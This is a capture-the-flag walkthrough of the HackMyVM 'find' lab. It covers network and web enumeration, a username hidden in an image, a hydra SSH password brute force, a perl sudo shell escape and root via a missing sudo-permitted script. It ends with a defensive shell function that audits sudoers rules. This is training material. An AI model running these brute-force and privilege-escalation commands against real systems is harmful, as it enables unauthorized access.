HackmyVM-find


Information gathering

arp-scan -l

┌──(root㉿kali)-[~/Desktop/tmp]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ff:66:80, IPv4: 192.168.31.129
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.31.1 0a:00:27:00:00:11 (Unknown: locally administered)
192.168.31.2 08:00:27:dd:48:d1 PCS Systemtechnik GmbH
192.168.31.145 08:00:27:19:2f:ed PCS Systemtechnik GmbH

192.168.31.145 is the target's IP; next, scan its ports

┌──(root㉿kali)-[~/Desktop/tmp]
└─# nmap 192.168.31.145
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-18 23:23 EDT
Nmap scan report for 192.168.31.145
Host is up (0.0022s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:19:2F:ED (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 6.86 seconds

Directory enumeration

┌──(root㉿kali)-[~/Desktop/tmp]
└─# gobuster dir -u "http://192.168.31.145/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.txt,.jpg
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.31.145/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/cat.jpg (Status: 200) [Size: 35137]
/manual (Status: 301) [Size: 317] [--> http://192.168.31.145/manual/]
/robots.txt (Status: 200) [Size: 13]
/server-status (Status: 403) [Size: 279]

user.txt

robots.txt hints that you should find the user; download cat.jpg

┌──(root㉿kali)-[~/Desktop/tmp]
└─# strings cat.jpg
...
>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR

The last string is a Malbolge program; running it yields missyred, then brute-force the password with hydra

┌──(root㉿kali)-[~/Desktop/tmp]
└─# hydra -l missyred -P /usr/share/wordlists/rockyou.txt 192.168.31.145 ssh
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-04-18 23:30:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.31.145:22/
[22][ssh] host: 192.168.31.145 login: missyred password: iloveyou

Log in over ssh and run sudo -l

missyred@find:~$ sudo -l
[sudo] password for missyred:
Matching Defaults entries for missyred on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User missyred may run the following commands on find:
(kings) /usr/bin/perl

Escalate to kings through perl

missyred@find:~$ sudo -u kings perl -e 'exec "/bin/sh";'

root.txt

kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User kings may run the following commands on find:
(ALL) NOPASSWD: /opt/boom/boom.sh

/opt/boom/boom.sh does not exist, so we can create it ourselves and have it run any shell command we like

#boom.sh
bash -p

sudo /opt/boom/boom.sh

Escalate to root and read root.txt
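The root step works only because the sudoers rule names a path that does not exist, so whoever can create it owns the rule. As an added example that is not part of this write-up, the POSIX sh function below reads a sudoers-format file and flags every command path that is missing or that lives in a group/other-writable file or directory; the function name, the sample rules and the GNU stat dependency are my own assumptions.

```shell
#!/bin/sh
# Added example, not part of the write-up: audit sudoers-format rules for
# command paths that are missing, or that sit in a file or directory writable
# by group/other. A rule on a path that does not exist (like /opt/boom/boom.sh
# above) is only as safe as the permissions on the place it would be created.
# Assumes GNU stat (-c '%a'). Usage: audit_sudo_cmds /etc/sudoers.d/<file>
# Prints one finding per line and returns 1 if there were any, 0 otherwise.

mode_of() { stat -c '%a' "$1"; }               # octal permission bits, e.g. 755
audit_sudo_cmds() {
    rules_file="$1"; findings=0
    set -f                                      # no globbing while splitting specs
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in
            ''|\#*|Defaults*) continue ;;       # blank, comment, Defaults: no command
            *=*) ;;                             # "who HOST=(runas) TAG: cmd, cmd"
            *) continue ;;
        esac
        spec="${line#*=}"                       # text after "HOST="
        spec="${spec#*\)}"                      # drop the optional "(runas)" group
        old_ifs="$IFS"; IFS=','; set -- $spec; IFS="$old_ifs"
        for cmd in "$@"; do                     # one comma-separated command spec
            path=''
            for tok in $cmd; do                 # first token starting with / is the
                case "$tok" in                  # path; tags like NOPASSWD: precede it
                    /*) path="$tok"; break ;;
                esac
            done
            [ -n "$path" ] || continue          # ALL / aliases are not path checks
            if [ ! -e "$path" ]; then
                printf 'MISSING %s\n' "$path"
                findings=$((findings + 1))
                continue
            fi
            # 022 = group-write | other-write; the leading 0 makes the mode octal
            if [ $(( 0$(mode_of "$path") & 022 )) -ne 0 ]; then
                printf 'WRITABLE-FILE %s\n' "$path"
                findings=$((findings + 1))
            fi
            dir=$(dirname "$path")
            if [ $(( 0$(mode_of "$dir") & 022 )) -ne 0 ]; then
                printf 'WRITABLE-DIR %s (holds %s)\n' "$dir" "$path"
                findings=$((findings + 1))
            fi
        done
    done < "$rules_file"
    set +f
    [ "$findings" -eq 0 ]
}
```

Rules that grant an interpreter such as (kings) /usr/bin/perl pass this check, since the binary is real and root-owned; those need a separate review of what the command itself can do.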
